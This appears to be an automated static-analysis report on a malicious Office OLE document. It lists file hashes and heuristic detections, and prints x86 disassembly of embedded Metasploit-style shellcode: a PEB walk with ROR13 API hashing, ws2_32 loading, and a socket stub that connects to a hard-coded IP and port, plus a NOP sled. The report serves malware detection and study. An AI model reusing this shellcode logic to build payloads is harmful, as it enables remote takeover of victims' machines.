Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 025779a5d66a7d31…

MALICIOUS

Office (OLE)

19.1 KB First seen: 2012-09-15
MD5: 22917938d55ba421639e4c6ba24d1cb3 SHA-1: 091e3a577ea3105273f2e7a740cb97ccff466124 SHA-256: 025779a5d66a7d31767a00220c964bbcf0c30bfb6b6de0cff41c3cdfa57bbe8b
200 Risk Score

Heuristics 5

  • Metasploit bind_tcp shellcode critical SC_MSF_BIND
    Metasploit bind_tcp shellcode
    Disassembly
    x86 disassembly · validity: code (0.969) — 9/9 branch targets land on an instruction boundary (100% coherence)
    00000637  fc                cld
00000638  e889000000        call 0x6c6
0000063D  60                pushal
0000063E  89e5              mov ebp, esp
00000640  31d2              xor edx, edx
00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
00000646  8b520c            mov edx, dword ptr [edx + 0xc]
00000649  8b5214            mov edx, dword ptr [edx + 0x14]
0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
00000653  31ff              xor edi, edi
00000655  31c0              xor eax, eax
00000657  ac                lodsb al, byte ptr [esi]
00000658  3c61              cmp al, 0x61
0000065A  7c02              jl 0x65e
0000065C  2c20              sub al, 0x20
0000065E  c1cf0d            ror edi, 0xd
00000661  01c7              add edi, eax
00000663  e2f0              loop 0x655
00000665  52                push edx
00000666  57                push edi
00000667  8b5210            mov edx, dword ptr [edx + 0x10]
0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
0000066D  01d0              add eax, edx
0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
00000672  85c0              test eax, eax
00000674  744a              je 0x6c0
00000676  01d0              add eax, edx
00000678  50                push eax
00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
0000067F  01d3              add ebx, edx
00000681  e33c              jecxz 0x6bf
00000683  49                dec ecx
00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
00000687  01d6              add esi, edx
00000689  31ff              xor edi, edi
0000068B  31c0              xor eax, eax
0000068D  ac                lodsb al, byte ptr [esi]
0000068E  c1cf0d            ror edi, 0xd
00000691  01c7              add edi, eax
00000693  38e0              cmp al, ah
00000695  75f4              jne 0x68b
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 78% of instructions — a sled or padding/filler run, not program logic).
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (1.0) — 8/8 branch targets land on an instruction boundary (100% coherence)
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
00000646  8b520c            mov edx, dword ptr [edx + 0xc]
00000649  8b5214            mov edx, dword ptr [edx + 0x14]
0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
00000653  31ff              xor edi, edi
00000655  31c0              xor eax, eax
00000657  ac                lodsb al, byte ptr [esi]
00000658  3c61              cmp al, 0x61
0000065A  7c02              jl 0x65e
0000065C  2c20              sub al, 0x20
0000065E  c1cf0d            ror edi, 0xd
00000661  01c7              add edi, eax
00000663  e2f0              loop 0x655
00000665  52                push edx
00000666  57                push edi
00000667  8b5210            mov edx, dword ptr [edx + 0x10]
0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
0000066D  01d0              add eax, edx
0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
00000672  85c0              test eax, eax
00000674  744a              je 0x6c0
00000676  01d0              add eax, edx
00000678  50                push eax
00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
0000067F  01d3              add ebx, edx
00000681  e33c              jecxz 0x6bf
00000683  49                dec ecx
00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
00000687  01d6              add esi, edx
00000689  31ff              xor edi, edi
0000068B  31c0              xor eax, eax
0000068D  ac                lodsb al, byte ptr [esi]
0000068E  c1cf0d            ror edi, 0xd
00000691  01c7              add edi, eax
00000693  38e0              cmp al, ah
00000695  75f4              jne 0x68b
00000697  037df8            add edi, dword ptr [ebp - 8]
0000069A  3b7d24            cmp edi, dword ptr [ebp + 0x24]
0000069D  75e2              jne 0x681
0000069F  58                pop eax
000006A0  8b                .byte 0x8b
000006A1  58                pop eax
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: code (1.0) — 8/8 branch targets land on an instruction boundary (100% coherence)
    00000642  648b5230          mov edx, dword ptr fs:[edx + 0x30]
00000646  8b520c            mov edx, dword ptr [edx + 0xc]
00000649  8b5214            mov edx, dword ptr [edx + 0x14]
0000064C  8b7228            mov esi, dword ptr [edx + 0x28]
0000064F  0fb74a26          movzx ecx, word ptr [edx + 0x26]
00000653  31ff              xor edi, edi
00000655  31c0              xor eax, eax
00000657  ac                lodsb al, byte ptr [esi]
00000658  3c61              cmp al, 0x61
0000065A  7c02              jl 0x65e
0000065C  2c20              sub al, 0x20
0000065E  c1cf0d            ror edi, 0xd
00000661  01c7              add edi, eax
00000663  e2f0              loop 0x655
00000665  52                push edx
00000666  57                push edi
00000667  8b5210            mov edx, dword ptr [edx + 0x10]
0000066A  8b423c            mov eax, dword ptr [edx + 0x3c]
0000066D  01d0              add eax, edx
0000066F  8b4078            mov eax, dword ptr [eax + 0x78]
00000672  85c0              test eax, eax
00000674  744a              je 0x6c0
00000676  01d0              add eax, edx
00000678  50                push eax
00000679  8b4818            mov ecx, dword ptr [eax + 0x18]
0000067C  8b5820            mov ebx, dword ptr [eax + 0x20]
0000067F  01d3              add ebx, edx
00000681  e33c              jecxz 0x6bf
00000683  49                dec ecx
00000684  8b348b            mov esi, dword ptr [ebx + ecx*4]
00000687  01d6              add esi, edx
00000689  31ff              xor edi, edi
0000068B  31c0              xor eax, eax
0000068D  ac                lodsb al, byte ptr [esi]
0000068E  c1cf0d            ror edi, 0xd
00000691  01c7              add edi, eax
00000693  38e0              cmp al, ah
00000695  75f4              jne 0x68b
00000697  037df8            add edi, dword ptr [ebp - 8]
0000069A  3b7d24            cmp edi, dword ptr [ebp + 0x24]
0000069D  75e2              jne 0x681
0000069F  58                pop eax
000006A0  8b                .byte 0x8b
000006A1  58                pop eax
  • x86 push-string-call medium SC_PUSH_STRING
    Shellcode-style PUSH imm32 sequence builds an execution, network, or Windows API string on the stack
    Disassembly
    x86 disassembly · validity: code (0.923) — 6/6 branch targets land on an instruction boundary (100% coherence)
    000006C7  6833320000        push 0x3233
000006CC  687773325f        push 0x5f327377
000006D1  54                push esp
000006D2  684c772607        push 0x726774c
000006D7  ffd5              call ebp
000006D9  b890010000        mov eax, 0x190
000006DE  29c4              sub esp, eax
000006E0  54                push esp
000006E1  50                push eax
000006E2  6829806b00        push 0x6b8029
000006E7  ffd5              call ebp
000006E9  50                push eax
000006EA  50                push eax
000006EB  50                push eax
000006EC  50                push eax
000006ED  40                inc eax
000006EE  50                push eax
000006EF  40                inc eax
000006F0  50                push eax
000006F1  68ea0fdfe0        push 0xe0df0fea
000006F6  ffd5              call ebp
000006F8  97                xchg edi, eax
000006F9  6a05              push 5
000006FB  680a5a8156        push 0x56815a0a
00000700  680200115c        push 0x5c110002
00000705  89e6              mov esi, esp
00000707  6a10              push 0x10
00000709  56                push esi
0000070A  57                push edi
0000070B  6899a57461        push 0x6174a599
00000710  ffd5              call ebp
00000712  85c0              test eax, eax
00000714  740c              je 0x722
00000716  ff4e08            dec dword ptr [esi + 8]
00000719  75ec              jne 0x707
0000071B  68f0b5a256        push 0x56a2b5f0
00000720  ffd5              call ebp
00000722  6a00              push 0
00000724  6a04              push 4
00000726  56                push esi

Open this report in the interactive analyzer, or submit your own file for analysis.